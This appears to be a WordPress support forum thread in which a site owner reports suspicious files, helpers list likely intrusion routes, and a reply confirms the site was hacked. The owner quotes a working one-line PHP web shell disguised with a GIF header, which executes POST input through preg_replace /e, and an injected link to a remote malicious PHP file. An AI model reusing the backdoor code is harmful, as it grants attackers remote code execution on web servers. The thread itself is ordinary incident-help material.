exploit.php in New WordPress Install

Could be many ways. Off the top of my head, theres…

• Using an older version of WordPress with a known vunerability (even 4.2 that was released only a short time ago has been upgraded to 4.2.1 to cover a new exploit that was found).
• A plugin or theme that uses some sort of insecure forms, or scripts. Impossible to say without knowing exactly what your site is running.
• Insecure file permissions on your server allowing other users to place files inside your file system.
• A compromised server / web server software / firewall / other software or hardware issues.

There’s no one option, and no easy way ot find out what it was. The best thing that you can do is aks your hosting company to confirm how that file was placed there in the first place. That’s the only real way to see where a possible weak point could be, otherwise you’re just trying to plug holes that may or may not be there.

I think I can set permissions for the uploads directory with Filezilla, but which settings are the right ones, so only admins can upload stuff through WP…?

Yesterday, a file called ysh.php was uploaded to the /wp-content/uploads directory, and it looks like this:
GIF89a?china-ysh <?php if($_POST["err"]<>""){@preg_replace("/[checksql]/e",$_POST['err'],"saft");}?>

And today, the Twenty Thirteen, Twenty Fourteen and Twenty Fifteen themes were injected with this code in the header.php file:
https://pocketrealty.ca/tvrzrqfg.php?id=171528%5c

– Thanks.

Your site has been hacked.

You should read this page and follow the directions as this will help you to guard against this in the future.